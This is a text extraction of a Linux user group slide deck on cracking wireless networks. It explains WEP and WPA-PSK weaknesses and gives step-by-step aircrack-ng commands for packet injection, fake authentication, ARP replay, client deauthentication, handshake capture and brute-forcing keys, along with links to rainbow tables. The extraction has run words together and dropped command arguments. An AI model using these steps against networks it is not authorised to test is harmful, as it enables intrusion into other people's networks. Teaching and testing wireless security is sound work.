How to Crack WPA

8/12/2019 How to Crack WPA

1/13

Ryan Curtin Cracking Wireless - p. 1

Cracking Wireless

Ryan Curtin

LUG@GT
http://www.igglybob.com/http://www.igglybob.com/


2/13

Goals

Setting Up

Checking Injection

WEP

WPA

Questions and Comments?


Goals

By the end of this presentation (if you stay awake), you will:

Understand the different types of wireless keys as well as

their advantages and disadvantages

Understand the legal ramifications of cracking wireless keys

Have a basic idea of the theory behind the cracking of eachkey type

Know how to use software to crack wireless keys


3/13

Goals

Setting Up

Checking Injection

WEP

WPA



Setting Up

Most of the work can be done with the aircrack-ngpackage.

None of these attacks can be performed if you are using

ndiswrapper for your network drivers, or other drivers that donot support promiscuous (or monitor) mode.

Starting / stopping promiscuous mode:

airmon-ng stop wlan0airmon-ng check wlan0

airmon-ng start wlan0


4/13

Goals

Setting Up

Checking Injection

WEP

WPA



Checking Injection

Before starting, make sure your card can inject packets into anAP!

aireplay-ng -9 -e -a wlan0

Make sure the percentage of ping replies is not incrediblysmall, otherwise it may be difficult to collect data.


5/13

Goals

Setting Up

Checking Injection

WEP WEP Encryption

Cracking WEP

Using aircrack-ng

Using aircrack-ng (2)

WPA



WEP Encryption

The slide title isnotredundant! WEP stands for wiredequivalent privacy, not wireless encryption protocol.

64-bit or 128-bit keys

Uses RC4 stream cipher with CRC-32 checksum

Keys have 24-bit IV (initialization vector)

224(16 million) possible IVs

50% probability of repeated IV after only 5000 packets


6/13

Goals

Setting Up

Checking Injection

WEP WEP Encryption

Cracking WEP

Using aircrack-ng


WPA



Cracking WEP

Different methods have been developed:

2001: Fluhrer, Mantin, and Shamir publish WEP flaws and a

passive attack

2005: FBI demonstrates WEP cracking in three minutes

2006: Bittau, Handley, and Lackey show that active attacksare possible

2007: Pychine, Tews, and Weinmann optimize active attack(PTW attack)


7/13

Goals

Setting Up

Checking Injection

WEP

WEP Encryption

Cracking WEP

Using aircrack-ng


WPA



Using aircrack-ng

1. Gather important data: access point MAC, ESSID, channelairodump-ng wlan0

2. Start capture of IVsairodump-ng -c -bssid -w

wlan0

Leave this running! You want to capture around 50k IVs

to ensure success (maybe more)

3. Fake authentication with APaireplay-ng -1 0 -e -a

wlan0


8/13

Goals

Setting Up

Checking Injection

WEP

WEP Encryption

Cracking WEP

Using aircrack-ng


WPA




4 Reinject ARP packets to get more IVsaireplay-ng -3 -b wlan0

Run until you have a substantial number of IVs (in yourairodump-ng process)

5 Crack the key!

FMS attacks (slow): aircrack-ng -f 1 -F.capPTW attacks (fast!): aircrack-ng -P 2

.cap


9/13

Goals

Setting Up

Checking Injection

WEP

WPA

WPA Encryption

Cracking WPA-PSK

Using aircrack-ng

Rainbow Tables



WPA Encryption

WPA with TKIP appeared as an interim solution to the WEPproblem while 802.11i was prepared; 802.11i is WPA2.

WPA: Wi-Fi Protected Access TKIP: Temporal Key Integrity Protocol

TKIP also uses RC4 cipher (for legacy WEP hardware)

Use AES instead if possible!

IV length increased to 48 bits

WPA-PSK (pre-shared key): common consumer

environment setup


10/13

Goals

Setting Up

Checking Injection

WEP

WPA

WPA Encryption

Cracking WPA-PSK

Using aircrack-ng

Rainbow Tables



Cracking WPA-PSK

The WPA PSK initialization process is reproducible!

Therefore, we must capture a WPA handshake and then try toreplicate it.


11/13

Goals

Setting Up

Checking Injection

WEP

WPA

WPA Encryption

Cracking WPA-PSK

Using aircrack-ng

Rainbow Tables



Using aircrack-ng

1. Gather important data: access point MAC, ESSID, channel;optional: ESSID of connected client

airodump-ng wlan0

2. Start capture of handshakesairodump-ng -c -bssid -w

wlan0

Leave this running! Watch for WPA handshake:xx:xx:xx:xx:xx:xx

3. (Optional) Fake deauthentication of client to trigger

handshakeaireplay-ng -0 1 -a -c wlan0

Watch for successful ACK in program output

4. Brute-force attack saved handshakeaircrack-ng -w -b


12/13

Goals

Setting Up

Checking Injection

WEP

WPA

WPA Encryption

Cracking WPA-PSK

Using aircrack-ng

Rainbow Tables



Rainbow Tables

Rainbow Tables: a giant collection of potential commonpassphrases

Available from:

Church of Wifi Rainbow Tables:http://www.renderlab.net/projects/WPA-tables/

The Schmoo Group: http://rainbowtables.shmoo.com/

Google Search:http://www.google.com/#q=wpa+rainbow+tables


13/13

Goals

Setting Up

Checking Injection

WEP

WPA





Documents

How to Crack WPA